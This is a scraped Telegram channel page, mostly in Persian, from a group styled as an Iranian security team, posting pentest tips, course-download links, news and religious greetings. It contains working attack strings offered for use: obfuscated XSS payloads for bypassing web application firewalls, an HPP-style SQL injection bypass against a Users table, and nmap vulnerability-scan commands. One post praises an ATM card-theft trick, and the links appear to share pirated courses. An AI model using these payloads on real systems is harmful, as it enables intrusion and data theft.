Unidentified T E A M
1.1K subscribers
230 photos
45 videos
85 files
278 links
~⚘🌹 Just God 🌷~

🇮🇷 Unidentified Security Team 🇮🇷
_________________________________________________
< The Best Cyber Security Team in Iran right now

Support TEAM: @UNIDENTIFIED_TM_bot
Download Telegram
🌺🌺🌺 عید غدیر مبارک 🌺🌺🌺
#LiveLikeAli
پورت‌های رایج و مورد‌استفاده اسپلانک به تفکیک استفاده در هر کامپونت

#splunk
#port
اینترنت ماهواره‌‌ای استارلینک که از آن به نام «اینترنت آزاد» نام برده می‌شود، عملیاتی و نتیجه تست سرعت آن منتشر شد !

شنیده شده که این سرویس برای ایران هم ارائه خواهد شد. با اضافه شدن ماهواره‌های بیشتری در هفته‌های آتی، سرعت اینترنت بر روی این شبکه به ۶۰۰مگابیت هم خواهد رسید !


@unidentified_tm
#news
فرا رسیدن ماه محرم را بر تمام مسلمین جهان تسلیت عرض مینماییم.
دوره های مرتبط با تست نفوذ از یودمی

Cybersecurity Collection:
https://drive.google.com/drive/folders/1q2sOBNU4lPBkwtF1Msl6uCACBV5TUGWD

Kali linux - Complete Training Program from Scratch course:
https://drive.google.com/folderview?id=1714TBeP8chDWSIPCcALAuEM5ZNQsLYsn

Bug Bounty Hunting Guide to an Advanced Earning Method:
https://drive.google.com/drive/folders/1ytZk4T1EnPPwmtt9FJX0BjNPnafzPWwr

Learn Ethical Hacking From Scratch:
https://drive.google.com/folderview?id=1Ns62tznu2mj7Q0QktrWGCcNsrL5CigtN

Ethical Hacking With Python, JavaScript and Kali Linux:
https://drive.google.com/folderview?id=1wniooIDbtt7yI9tx1sCjVdKn3ftZNas2

منبع geeekgirls
#IoT #Analyzer #C #SourceCodeAnalysis #Automation
یکی از نکات مهم در هنگام تست نفوذ و آنالیز، صرفه جویی در وقت هست.
یکی از ابزار‌های خوب و قدرتمند جهت کشف آسیب‌پذیری های مرتبط با BOF و Integer Overflow و ... ابزار flawfinder می‌باشد که با تحلیل کد این کار رو به سادگی برای ما انجام میده. اما با کمی دانش بش اسکریپتینگ میشه این فرآیند رو برای تمامی فایل‌های سی به صورت خودکار انجام داد.
این ابزار میتونه برای تحلیل کد های سی در نرم‌افزار‌ها و سورس Firmware های IoT خیلی کاربردی باشه. همچنین این ابزار پشتیبانی کامل از CWE رو داره.
اسکریپت:
find . -regex ".*\.c$" | while read c_file; do echo "\n############$c_file############";flawfinder $c_file | egrep -i "\(port\)|\(buffer\)|\(shell\)|\(integer\)|Hits = "; done

لینک گیت هاب:
https://github.com/david-a-wheeler/flawfinder
نصب:
https://github.com/david-a-wheeler/flawfinder/blob/master/INSTALL.md


@Unidentified_TM
#securation
https://www.dhs.gov/xlibrary/assets/opnbiz/admt_firstsource_awards_fy2008.csv
دوستان این فایل از سایت وزارت امنیت بلاد کفر یا همون امریکا هستش توش اطلاعات هزینه های نرم افزار ها برای سازمان های امریکا هست آخرش هم گفته کلا چقد بوده و کجا و چطوری خرج شده اسم پروژه و نرم افزار هم زده ..


@Unidentified_TM
https://mega.nz/folder/utEVjARY#fFcYEi6PFiwKsrG3OHcAoA
کلکسیون کتاب های مرتبط با تست نفوذ
عاشورای حسینی را به تموم مسلمین جهان تسلیت عرض میکنیم.
🏴السلام و علیک یا حسین ابن علی
@Unidentified_tm
یکسری از دوره های فرادرس بدلیل محرم رایگان شدن
لینک دسترسی :
https://faradars.org/ev/moharam99/
آماده سوپرایز هستید؟❤️
پک کامل دوره های تست نفوذ از منابع مختلف
https://drive.google.com/drive/folders/1g152p22t0od_Ak1YEqTdTCIxcI57eL36
🌹کشف آسیب پذیری در سرویس های سرور هدف با استفاده از اسکریپت vulners

دستورالعمل:
wget https://raw.githubusercontent(.)com/vulnersCom/nmap-vulners/master/vulners.nse -O /usr/share/nmap/scripts/vulners.nse && nmap --script-updatedb

و سپس:

nmap -sV --script vulners <target>


@Unidentified_TM
پیلود xss برای بایپس کردن WAF

<svg onload="[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162'] ('\141\154\145\162\164\50\61\51')()">


<svg onload=&#97&#108&#101&#114&#116(1)>

@Unidentified_TM
روز برنامه نویسان مبارک❤️
This media is not supported in your browser
VIEW IN TELEGRAM
اینم یه حرکت هوشمندانه برای سرقت اطلاعات کارت بانکی و حساب در دستگاه عابر بانک((:
نحوه ی بایپس کردن Web Application Firewall در حملات sqli !

حمله ی معمولی:
http://webApplication/showproducts.asp?prodID=9 UNION SELECT 1,2,3 FROM Users WHERE id=3 --


حمله توسط روش HPP:
http://webApplication/showproducts.asp?prodID=9 /*&prodID=*/UNION /*&prodID=*/SELECT 1 &prodID=2 &prodID=3 FROM /*&prodID=*/Users /*&prodID=*/ WHERE id=3 --

@Unidentified_TM
سوالات خیلی از دوستان راجع به نقشه راه بود
انشالله بزودی راجع به نقشه راه پست میذارم